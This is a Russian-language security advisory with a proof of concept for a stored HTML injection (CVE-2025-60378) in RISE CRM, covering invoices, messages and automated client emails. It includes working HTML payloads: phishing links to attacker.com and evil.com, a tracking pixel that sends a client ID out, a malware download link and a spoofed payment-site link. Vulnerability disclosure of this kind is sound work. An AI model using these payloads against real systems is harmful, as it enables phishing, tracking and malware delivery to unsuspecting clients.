
Доказательство концепции для хранимой HTML-инъекции в RISE CRM, демонстрирующее, как аутентифицированные пользователи могут внедрять вредоносный HTML в счета и сообщения, что приводит к фишингу и распространению вредоносного ПО через автоматические электронные письма и PDF-файлы.
⚠️ Уведомление о безопасности
Критическая уязвимость хранимой HTML-инъекции, затрагивающая счета, обмен сообщениями и автоматические уведомления
Критическая уязвимость хранимой HTML-инъекции обнаружена в RISE Ultimate Project Manager & CRM, которая позволяет аутентифицированным пользователям внедрять вредоносный HTML в позиции счетов, заметки клиентов и модули обмена сообщениями. Внедренный контент сохраняется в базе данных и автоматически отображается в клиентских электронных письмах, PDF-файлах и чат-коммуникациях, что позволяет проводить масштабные фишинговые атаки, компрометацию деловой электронной почты и доставку вредоносного ПО через электронную почту/PDF.
| Атрибут | Значение |
|---|---|
| CVE ID | CVE-2025-60378 |
| Тип | Хранимая HTML-инъекция |
| CWE | CWE-79 |
| Вектор атаки | Сеть/Удаленно |
| Аутентификация | Требуется (низкие привилегии) |
| Взаимодействие с пользователем | Нет |
| Серьезность | ВЫСОКАЯ |
| CVSS v3.1 | 8.1 - Высокая |
| Обнаружил | Ajansha Shankar |
RISE CRM не выполняет надлежащую санитизацию и кодирование HTML-контента в нескольких редактируемых пользователем полях, включая счета, сообщения и заметки клиентов. Когда аутентифицированные пользователи внедряют HTML-полезные нагрузки в эти поля, контент сохраняется в базе данных без адекватной фильтрации. Впоследствии этот вредоносный HTML автоматически отображается в клиентских электронных письмах, PDF-вложениях и модулях обмена сообщениями/чата без надлежащего экранирования. Повторяющиеся счета и автоматические сообщения усиливают атаку, распространяя вредоносный контент одновременно нескольким получателям.
| Фактор | Воздействие | Пояснение |
|---|---|---|
| Конфиденциальность | 🔴 ВЫСОКОЕ | Учетные данные клиентов и конфиденциальные данные могут быть собраны через фишинг |
| Целостность | 🔴 ВЫСОКОЕ | Вредоносный контент может исказить восприятие коммуникаций и деловых отношений |
| Доступность | 🟡 НИЗКОЕ | Ограниченное прямое воздействие на доступность системы |
Злоумышленник с низкими привилегиями менеджера проекта создает счет с вредоносным HTML:
<a href="https://attacker.com/fake-payment">Click here to view payment status</a>
Счет отправляется более чем 100 клиентам через автоматическую электронную почту. Все клиенты получают то, что выглядит как легитимный счет, направляющий их на фишинговый сайт. Злоумышленник одновременно собирает учетные данные от нескольких жертв.
Злоумышленник внедряет вредоносный HTML в сообщение клиенту:
<img src="https://attacker.com/track.gif?user=CLIENT_ID">
<a href="https://malware.com">Download Updated Project Files</a>
Все члены команды и клиенты получают сообщение в чате и переходят по ссылкам для загрузки вредоносного ПО.
Злоумышленник настраивает повторяющийся счет с полезной нагрузкой для доставки вредоносного ПО. Каждый месяц клиенты автоматически получают счета со встроенным вредоносным контентом, что обеспечивает постоянный вектор атаки.
Перейдите: Панель управления RISE CRM → Счета/Сообщения → Создать новый
<a href="https://attacker.com">Click here to view invoice</a>
<a href="https://evil.com" target="_blank">
<img src="https://media1.giphy.com/media/v1.Y2lkPTc5MGI3NjExbzg4OXRuZHd4MXF0bWNqa3BvN2pzbWdqMzRxZHc5bHJpbXpucHNtaSZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw/9PgvV8ale90lQwfQTZ/giphy.gif">
</a>
<h1><font color=red>Visit Our New WebSite</font></h1>
<h3><mark><a href="https://evil.com">https://www.paytm.com/</a></mark></h3>
✅ Внедренный HTML отображается в электронных письмах, PDF и обмене сообщениями без экранирования ✅ Ссылки кликабельны и перенаправляют на сайты злоумышленника ✅ Изображения загружаются с серверов, контролируемых злоумышленником ✅ Контент сохраняется во всех будущих коммуникациях с клиентами ✅ Повторяющееся распространение автоматически достигает нескольких получателей